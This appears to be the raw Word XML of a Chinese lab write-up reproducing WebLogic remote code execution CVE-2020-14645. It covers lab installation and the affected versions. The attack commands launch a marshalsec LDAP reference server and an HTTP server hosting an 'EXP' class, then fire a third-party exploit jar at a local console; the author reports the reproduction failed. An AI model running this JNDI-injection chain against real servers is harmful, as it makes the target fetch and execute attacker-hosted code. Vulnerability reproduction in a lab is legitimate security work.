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51574" w14:textId="4C0EDA8F" w:rsidR="00F01B26" w:rsidRDefault="00EC1932" w:rsidP="00EC1932">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2020-14645</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00813156">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（暂时复现失败）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A62BD1" w14:textId="661645EF" w:rsidR="00EC1932" w:rsidRPr="00E741DA" w:rsidRDefault="00EC1932" w:rsidP="00EC1932">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E741DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6384C9" w14:textId="343630F7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10.3.6.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFE82F" w14:textId="3D96E3BD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12.1.3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F73E4" w14:textId="2751F737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12.2.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47668AEB" w14:textId="55A984FB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12.2.1.4.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A8E15" w14:textId="43EC2739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14.1.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321276D6" w14:textId="08D293D6" w:rsidR="00E741DA" w:rsidRPr="002A21D5" w:rsidRDefault="009F3D52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8"/>
          <w:szCs w:val="28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安装</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="546C17C3" w14:textId="1E014721" w:rsidR="00E741DA" w:rsidRDefault="00E741DA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使用的是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jdk8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7D740" w14:textId="77777777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Version 12.2.1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80DE04" w14:textId="7F576F3B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（下载地址</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="4183C4"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420719F3" w14:textId="77777777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6AEC6A12" w14:textId="3CB8968F" w:rsidR="005D15B5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解压之后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Java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-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r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里面的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jar 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这里可能会出现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Java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版本的问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862043F" w14:textId="42DB228F" w:rsidR="002A21D5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A21D5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC9AD8D" wp14:editId="4D34296F">
            <wp:extent cx="5274310" cy="1931035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19426560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602" name="图片 1" descr="图形用户界面,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498" w14:textId="77777777" w:rsidR="002A21D5" w:rsidRPr="00E741DA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3DC9668D" w14:textId="2D8F7AC6" w:rsidR="00E741DA" w:rsidRPr="00E741DA" w:rsidRDefault="002A21D5" w:rsidP="00E741D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A21D5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7465CE06" wp14:editId="16BC6707">
            <wp:extent cx="5274310" cy="4093210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16180188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8804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945" w14:textId="076083D2" w:rsidR="00E741DA" w:rsidRDefault="002A21D5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配置过程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密码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2345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E759BD8" w14:textId="4DE26BA1" w:rsidR="002A21D5" w:rsidRDefault="002A21D5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2A21D5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0247CDA5" wp14:editId="135CC303">
            <wp:extent cx="5274310" cy="3964305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10239712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71207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C4C" w14:textId="503F1BA1" w:rsidR="002A21D5" w:rsidRPr="002A21D5" w:rsidRDefault="002A21D5" w:rsidP="003E2C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2A21D5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安装完成之后</w:t>
      </w:r>
      <w:r w:rsidRPr="002A21D5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A21D5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidR="003E2C7F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003E2C7F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Oracle/Middleware/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Oracle_Home</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E2C7F"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user_projects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E2C7F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/domains/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base_domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E2C7F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744EEF7" w14:textId="13094F2E" w:rsidR="002A21D5" w:rsidRDefault="002A21D5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</w:pPr>
      <w:r w:rsidRPr="002A21D5"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启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A21D5"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weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23D6E42C" w14:textId="49D6CD68" w:rsidR="003E2C7F" w:rsidRPr="002A21D5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  <w:t xml:space="preserve">ip:7001/console </w:t>
      </w:r>
      <w:r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就可以正常访问了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A37BBB" w14:textId="18BCB1B1" w:rsidR="003E2C7F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3E2C7F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19F9A49A" wp14:editId="6CB43D05">
            <wp:extent cx="5274310" cy="2520950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1789059102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9102" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件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7C7" w14:textId="77777777" w:rsidR="003E2C7F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30012147" w14:textId="7C6658E2" w:rsidR="003E2C7F" w:rsidRDefault="002C13B3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开启的服务都是通过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转发的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50302512" w14:textId="6CC75A9A" w:rsidR="0047389D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234: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的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B743048" w14:textId="5E6E1930" w:rsidR="009F3D52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7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001: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weblogic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的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA1788" w14:textId="7EC3348D" w:rsidR="009F3D52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389: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默认端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C0AE4" w14:textId="3BD72AD1" w:rsidR="0047389D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先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写弹窗的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0047389D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poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="129E7696" w14:textId="48925AE2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然后在该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classes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底下打开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 w:rsidR="009F3D5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：</w:t>
      </w:r>
      <w:r w:rsidRPr="0047389D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python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0047389D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SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0047389D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1234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</w:p>
    <w:p w14:paraId="66ABBA76" w14:textId="66F76662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打开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连接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</w:p>
    <w:p w14:paraId="0501095B" w14:textId="7676420F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 w:hint="eastAsia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java -cp marshalsec-0.0.3-SNAPSHOT-all.jar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marshalsec.jndi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.LDAPRefServer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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00695A53">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
            <w:kern w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidRPr="00695A53">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
            <w:kern w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
        <w:r w:rsidRPr="00695A53">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
            <w:kern w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>.0.0.0:1234/#EXP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4475BC12" w14:textId="08FD3F69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默认端口是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389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C95D0" w14:textId="35FD370D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然后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利用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payload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去攻击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weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C1C802F" w14:textId="444873E4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proofErr w:type="spellStart"/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W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eblogic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地址是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hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00695A53">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:spacing w:val="8"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://192.168.1.6:7001/console</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B2EED16" w14:textId="77777777" w:rsidR="00813156" w:rsidRDefault="0047389D" w:rsidP="002A21D5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
      </w:pP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ayload</w:t>
      </w:r>
      <w:r w:rsidR="00813156" w:rsidRPr="00813156">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA6B58" w14:textId="184A0859" w:rsidR="0047389D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813156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java -jar CVE-2020-14645.jar 0.0.0.0:1389/#EXP http://192.168.1.6:7001/console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6F838" w14:textId="3B0D55B7" w:rsidR="0047389D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lastRenderedPageBreak/>
        <w:t>（如果有漏洞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就会通过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去执行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上的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EXP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但是这里复现失败了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没有弹窗）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1071A7D5" w14:textId="1DC6FA1D" w:rsidR="00813156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这个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jar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是别人写好的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payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE4923" w14:textId="77777777" w:rsidR="00813156" w:rsidRPr="0047389D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</w:p>
    <w:sectPr w:rsidR="00813156" w:rsidRPr="00473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932"/>
    <w:rsid w:val="002A21D5"/>
    <w:rsid w:val="002C13B3"/>
    <w:rsid w:val="003E2C7F"/>
    <w:rsid w:val="0047389D"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="005D15B5"/>
    <w:rsid w:val="00813156"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="009F3D52"/>
    <w:rsid w:val="00E741DA"/>
    <w:rsid w:val="00EC1932"/>
    <w:rsid w:val="00F0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53477"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13A2D4AA-F5F4-6A49-95EA-7A9F91EB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193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1932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E741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E741D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7389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3D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0.0.0.0:1234/#EX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192.168.1.6:7001/conso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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T05:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T08:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>